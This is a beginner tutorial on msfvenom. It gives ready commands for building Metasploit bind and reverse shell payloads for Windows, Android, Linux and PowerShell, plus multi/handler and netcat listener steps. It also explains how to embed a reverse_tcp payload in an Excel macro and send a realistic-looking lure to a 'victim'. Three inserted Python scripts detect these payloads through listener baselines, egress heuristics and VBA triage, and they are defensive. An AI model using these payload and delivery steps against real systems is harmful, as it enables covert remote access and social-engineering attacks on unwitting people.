Msfvenom Tutorials for Beginners


What is msfvenom ?

In simple words, msfvenom is a combination of msfpayload and msfencode: it generates payloads and encodes them in one step, so you no longer need to run two different commands to create a payload and then encode it. msfvenom comes with Metasploit by default.

In the terminal, type msfvenom. It will show you all available options for creating a payload.

Abbreviations used in the commands below:

lhost = IP of your machine (where the listener runs)

lport = any port you wish to assign to the listener

-p = payload (i.e. Windows, Android, PHP etc.)

-f = output format / file extension (i.e. windows=exe, android=apk etc.)

Bind shell

A bind shell opens a new listening service on the target machine and requires the attacker to connect to it in order to get a session.

In your terminal type:

msfvenom -p windows/meterpreter/bind_tcp -f exe > /root/Desktop/bind.exe

It will save the "exe" payload file on your desktop at the path given in the command, /root/Desktop/bind.exe. We need to send this file to the victim machine through a file share or by a social engineering technique and have it run on the system.

Now let us start msfconsole and type the commands below to get a session on the victim machine.

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/bind_tcp
msf exploit(handler) > set rhost xxx.xxx.xxx.xxx
msf exploit(handler) > set lport 4444
msf exploit(handler) > exploit

Once the file is executed on the machine, we will get a meterpreter session on the victim machine.

The bind_tcp option is helpful if we get disconnected from the victim machine while the payload is still running: we can run the same handler commands again and get the session back without the victim having to run the file again.
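From the defender's side, the footprint of a bind shell is exactly what the paragraph above describes: a new service listening on a port that nothing on the host is supposed to expose. The following script is an added example, not part of this tutorial or of Metasploit. It diffs a socket snapshot against a per-host baseline of expected listeners; the snapshot lines are constructed to look like `ss -ltnp` output on Linux (a Windows `netstat -ano` snapshot would need a different parser), and the baseline and process names are assumptions.

```python
"""Spot a new listening service (the footprint of a bind shell) by diffing a
socket snapshot against a known-good baseline.

Added example for this tutorial; not part of the original page. The snapshot
lines are constructed to resemble `ss -ltnp` output on Linux; the baseline is
an assumed per-host allow-list of (port, process) pairs.
"""
import re
from dataclasses import dataclass

# One `ss -ltnp` row: State Recv-Q Send-Q Local:Port Peer:Port [users:(("name",pid=N,fd=M))]
SS_ROW = re.compile(
    r'^LISTEN\s+\d+\s+\d+\s+(?P<addr>\S+):(?P<port>\d+)\s+\S+'
    r'(?:\s+users:\(\("(?P<proc>[^"]+)",pid=(?P<pid>\d+))?'
)


@dataclass(frozen=True)
class Listener:
    addr: str
    port: int
    proc: str
    pid: int


def parse_ss(text: str) -> list:
    """Parse `ss -ltnp`-style output into Listener records (header lines are skipped)."""
    found = []
    for line in text.splitlines():
        m = SS_ROW.match(line.strip())
        if m:
            found.append(Listener(m["addr"], int(m["port"]),
                                  m["proc"] or "?", int(m["pid"] or 0)))
    return found


# Assumed baseline for this host: (port, process) pairs that are supposed to listen.
BASELINE = {(22, "sshd"), (80, "nginx")}


def unexpected_listeners(snapshot: str, baseline=BASELINE) -> list:
    """Listeners absent from the baseline: what a freshly started bind shell looks like."""
    return [l for l in parse_ss(snapshot) if (l.port, l.proc) not in baseline]


# Constructed snapshot: the two expected services plus an unknown process
# listening on 4444, the port the tutorial's bind_tcp handler uses.
SAMPLE = """\
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
LISTEN 0      128    0.0.0.0:22         0.0.0.0:*         users:(("sshd",pid=812,fd=3))
LISTEN 0      511    0.0.0.0:80         0.0.0.0:*         users:(("nginx",pid=1021,fd=6))
LISTEN 0      1      0.0.0.0:4444       0.0.0.0:*         users:(("updater",pid=4410,fd=5))
"""

if __name__ == "__main__":
    for l in unexpected_listeners(SAMPLE):
        print(f"ALERT: unexpected listener {l.addr}:{l.port} ({l.proc}, pid {l.pid})")
```

Keying the baseline on the (port, process) pair rather than on the port alone matters: a bind shell that happens to pick a port another service normally uses would otherwise slip through, and a legitimate service moved to a new port shows up for review instead of silently disappearing.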

Reverse TCP Payload

A reverse shell (also known as a connect-back) is the exact opposite: it requires the attacker to set up a listener first on his box, the target machine acts as a client connecting to that listener, and then finally the attacker receives the shell.

Type command:

msfvenom -p windows/meterpreter/reverse_tcp lhost=xxx.xxx.xxx.xxx lport=5555 -f exe > /root/Desktop/reverse_tcp.exe

In this case, we include a few other options, lhost (local host) and lport (local port), so that the victim machine can make a reverse connection back to us.

Once the payload is generated and sent to the victim for execution, we move on to the next step as shown below.

Now let us start msfconsole and type the commands below to get a session on the victim machine.

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost xxx.xxx.xxx.xxx
msf exploit(handler) > set lport 5555
msf exploit(handler) > exploit

Once the payload is executed by the victim, we receive a reverse connection and get the meterpreter session.

HTTPS Payload

Note: Both of the above payloads work only if the relevant ports are reachable on the victim machine, so the question arises: what if the victim has blocked all other ports?

In such cases we can create payloads for the ports that are open on the victim machine, such as 443 for HTTPS.

Let us take this case and create a payload that uses HTTPS.

Type command:

msfvenom -p windows/meterpreter/reverse_https lhost=xxx.xxx.xxx.xxx lport=443 -f exe > /root/Desktop/443.exe

Once the payload is generated and sent to the victim for execution, we move on to the next step as shown below.

Now let us start msfconsole and type the commands below to get a session on the victim machine.

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_https
msf exploit(handler) > set lhost xxx.xxx.xxx.xxx
msf exploit(handler) > set lport 443
msf exploit(handler) > exploit

Once the payload is executed by the victim, we receive a reverse connection and get the meterpreter session.
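Both reverse payloads in the last two sections share one trait a defender can look for: a workstation opening a connection out to the attacker's listener, either on an unusual port (5555 in the reverse_tcp example) or on 443 but to a bare IP address rather than a hostname, which is how a reverse_https payload pointed at an lhost IP appears in egress logs. The script below is an added example, not part of this tutorial or of Metasploit; it applies those two heuristics to constructed firewall/proxy log lines in an assumed key=value format, and the egress policy it enforces is an assumption.

```python
"""Flag outbound connections that look like a reverse shell calling home.

Added example for this tutorial, not part of the original page. It reads
constructed firewall/proxy log lines in an assumed key=value format and
applies two heuristics: (1) an internal host reaching a port the egress
policy does not allow, and (2) a TLS connection on 443 with no server name
or an IP literal as the name.
"""
import ipaddress

# Assumed egress policy: ports workstations may reach directly.
ALLOWED_EGRESS_PORTS = {80, 443, 53}


def parse_kv(line: str) -> dict:
    """Parse 'k=v k=v ...' into a dict; tokens without '=' are ignored."""
    fields = {}
    for tok in line.split():
        if "=" in tok:
            k, v = tok.split("=", 1)
            fields[k] = v
    return fields


def is_ip_literal(name: str) -> bool:
    """True if the TLS server name is an IPv4/IPv6 address rather than a hostname."""
    try:
        ipaddress.ip_address(name)
        return True
    except ValueError:
        return False


def classify(event: dict) -> list:
    """Return the heuristic names an event trips (empty list = nothing suspicious)."""
    hits = []
    port = int(event.get("dport", 0))
    sni = event.get("sni", "-")
    if port not in ALLOWED_EGRESS_PORTS:
        hits.append("egress_port_not_allowed")
    if port == 443 and (sni == "-" or is_ip_literal(sni)):
        hits.append("tls_without_hostname")
    return hits


def suspicious_events(log: str) -> list:
    """Return (event, hits) pairs for every log line that trips at least one heuristic."""
    out = []
    for line in log.splitlines():
        ev = parse_kv(line)
        if not ev.get("src"):
            continue
        hits = classify(ev)
        if hits:
            out.append((ev, hits))
    return out


# Constructed sample: one normal browsing connection, one reverse_tcp-style
# call-out on 5555, and one reverse_https-style call-out to a bare IP on 443.
SAMPLE_LOG = """\
ts=2024-05-01T09:00:01Z src=10.0.0.23 dst=203.0.113.5 dport=443 proto=tcp sni=www.example.com
ts=2024-05-01T09:00:07Z src=10.0.0.23 dst=203.0.113.9 dport=5555 proto=tcp sni=-
ts=2024-05-01T09:00:09Z src=10.0.0.23 dst=203.0.113.9 dport=443 proto=tcp sni=203.0.113.9
"""

if __name__ == "__main__":
    for ev, hits in suspicious_events(SAMPLE_LOG):
        print(f"{ev['src']} -> {ev['dst']}:{ev['dport']} {', '.join(hits)}")
```

The second heuristic is deliberately narrow: plenty of legitimate software talks TLS to IP literals, so in practice it is a triage signal to combine with reputation data or beaconing frequency rather than an alert on its own. The first heuristic is the real control, and it only works if the egress policy behind it is actually enforced at the firewall.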

Hidden Bind TCP Payload

Let us now explore another technique available in msfvenom. This time, instead of a meterpreter session, we will get a plain command shell on the victim machine.

msfvenom -p windows/shell_hidden_bind_tcp ahost=xxx.xxx.xxx.xxx lport=1010 -f exe > /root/Desktop/hidden.exe

Once the payload is generated and sent to the victim for execution, we move on to the next step as shown below.

We use Netcat to set up our listener.

nc xxx.xxx.xxx.xxx 1010

Reverse Shell Payload with Netcat

Let us now repeat the process with the shell_reverse_tcp payload, one more way to get a shell session on the victim.

msfvenom -p windows/shell_reverse_tcp lhost=xxx.xxx.xxx.xxx lport=1111 -f exe > /root/Desktop/ncshell.exe

Once the payload is generated and sent to the victim for execution, we move on to the next step as shown below.

We set up our listener using netcat.

nc -lvp 1111

Macro Payload

Let us now create a payload as a VBA script, which we will use as a macro in an Excel workbook to exploit the victim machine.

Let us begin to create the payload!!

msfvenom -p windows/meterpreter/reverse_tcp lhost=xxx.xxx.xxx.xxx lport=7777 -f vba

Once the command is executed, copy the script starting from "#If VBA7" up to and including "#End If".

Now open an Excel file and press Alt+F11 to open the Visual Basic editor. You will get an options box; enter the name you would like to use and click "Create".

You will get a new options box. Click on "ThisWorkbook", replace its contents with the VBA payload you copied from the msfvenom output, close the Visual Basic editor and enable macros.

Now fill the Excel file with data that looks realistic enough for the victim to open it, and send it to the victim.

To capture the sessions let us now start the multi handler as stated below:

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost xxx.xxx.xxx.xxx
msf exploit(handler) > set lport 7777
msf exploit(handler) > exploit

Once the Excel file is opened by the victim, it will prompt them to enable macros. Once enabled, our VBA script runs and gives us a reverse connection to the victim machine.
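The macro this section describes has a recognisable shape once the VBA module is extracted from the workbook (for example with olevba from the oletools project): an auto-execute entry point such as Auto_Open or Workbook_Open, plus Win32 declarations that let the macro allocate memory, copy bytes into it and start a thread. The following triage script is an added example, not part of this tutorial or of Metasploit. It scores VBA source text on those two traits; both VBA modules embedded in it are constructed (the suspect one has its declarations' parameter lists and payload array replaced with placeholders, so it does nothing), and the indicator lists are assumptions you would extend from your own samples.

```python
"""Triage a VBA module for the traits of an in-memory shellcode runner.

Added example for this tutorial, not part of the original page. It scans VBA
source text for (1) an auto-execute entry point and (2) Win32 declarations
(VirtualAlloc, RtlMoveMemory, CreateThread) that together let a macro run
raw code in-process. A module with both is a strong candidate for the kind
of macro this section describes. The VBA samples below are constructed.
"""
import re

# Procedure names Office runs automatically when the document is opened.
AUTOEXEC = re.compile(
    r'\bSub\s+(Auto_Open|AutoOpen|Workbook_Open|Document_Open)\b', re.I)

# Win32 APIs that, declared together, allow a macro to execute raw code in-process.
EXEC_APIS = ("VirtualAlloc", "RtlMoveMemory", "CreateThread")

# `Declare [PtrSafe] Function|Sub <name> Lib "<dll>" [Alias "<real name>"]`
# The Alias clause matters: a module may hide the API behind an arbitrary local name.
DECLARE = re.compile(
    r'\bDeclare\s+(?:PtrSafe\s+)?(?:Function|Sub)\s+(?P<name>\w+)\s+Lib\s+"[^"]+"'
    r'(?:\s+Alias\s+"(?P<alias>\w+)")?', re.I)


def triage_vba(source: str) -> dict:
    """Return the indicators found and an overall verdict."""
    autoexec = sorted({m.group(1) for m in AUTOEXEC.finditer(source)})
    # Resolve each declaration to the real API name (the alias, when one is used).
    declared = {m.group("alias") or m.group("name") for m in DECLARE.finditer(source)}
    exec_apis = [api for api in EXEC_APIS if api in declared]
    if autoexec and len(exec_apis) == len(EXEC_APIS):
        verdict = "shellcode_runner"
    elif autoexec or exec_apis:
        verdict = "review"
    else:
        verdict = "benign"
    return {"autoexec": autoexec, "exec_apis": exec_apis, "verdict": verdict}


# Constructed suspect module: the shape of an auto-running shellcode loader,
# with parameter lists and the byte array replaced by placeholders.
SUSPECT = '''\
#If VBA7 Then
    Private Declare PtrSafe Function CreateThread Lib "kernel32" () As LongPtr
    Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" () As LongPtr
    Private Declare PtrSafe Function Mv Lib "kernel32" Alias "RtlMoveMemory" () As LongPtr
#End If

Sub Auto_Open()
    Dim buf As Variant
    buf = Array(0, 0, 0)
End Sub
Sub Workbook_Open()
    Auto_Open
End Sub
'''

# Constructed benign module for contrast: formats a cell, no API declarations.
BENIGN = '''\
Sub FormatReport()
    Range("A1").Font.Bold = True
End Sub
'''

if __name__ == "__main__":
    for label, src in (("suspect", SUSPECT), ("benign", BENIGN)):
        print(label, triage_vba(src))
```

Resolving the Alias clause is the part worth copying: checking only the declared name misses any module whose author renamed the imports, while resolving to the real export keeps the check stable across such renames.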

VNC Payload

Let us begin to create the payload!!

msfvenom -p windows/vncinject/reverse_tcp lhost=xxx.xxx.xxx.xxx lport=5900 -f exe > /root/Desktop/vnc.exe

Once the payload is generated and sent to the victim for execution, we move on to the next step. To capture the session, start the multi handler as shown below:

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/vncinject/reverse_tcp
msf exploit(handler) > set lhost xxx.xxx.xxx.xxx
msf exploit(handler) > set lport 5900
msf exploit(handler) > exploit

Android Payload

Let us use one of the Android payloads available in msfvenom and turn it to our benefit.

Let’s begin

msfvenom -p android/meterpreter/reverse_tcp lhost=xxx.xxx.xxx.xxx lport=8888 > /root/Desktop/file.apk

Once the payload gets generated send it to the victim to execute on his handheld and start multi handler.

msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
msf exploit(handler) > set lhost xxx.xxx.xxx.xxx
msf exploit(handler) > set lport 8888
msf exploit(handler) > exploit

Once the payload gets executed, you will get the meterpreter session.

Linux Payload

Open the terminal and type the command mentioned below:

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=xxx.xxx.xxx.xxx lport=4444 -f elf > /root/Desktop/shell

Once the payload gets generated send it to the victim to execute on his Linux machine and start multi handler.

msf > use exploit/multi/handler
msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp
msf exploit(handler) > set lhost xxx.xxx.xxx.xxx
msf exploit(handler) > set lport 4444
msf exploit(handler) > run

Powershell Payload

Open the terminal and type the command mentioned below:

msfvenom -p cmd/windows/reverse_powershell lhost=xxx.xxx.xxx.xxx lport=4444 > /root/Desktop/shell.bat

Once the payload gets generated send it to the victim to execute on his windows machine and start multi handler.

msf > use multi/handler
msf exploit(handler) > set payload cmd/windows/reverse_powershell
msf exploit(handler) > set lhost xxx.xxx.xxx.xxx
msf exploit(handler) > set lport 4444
msf exploit(handler) > run

Once the payload gets executed, it creates a reverse connection back to our listener and gives us a shell.
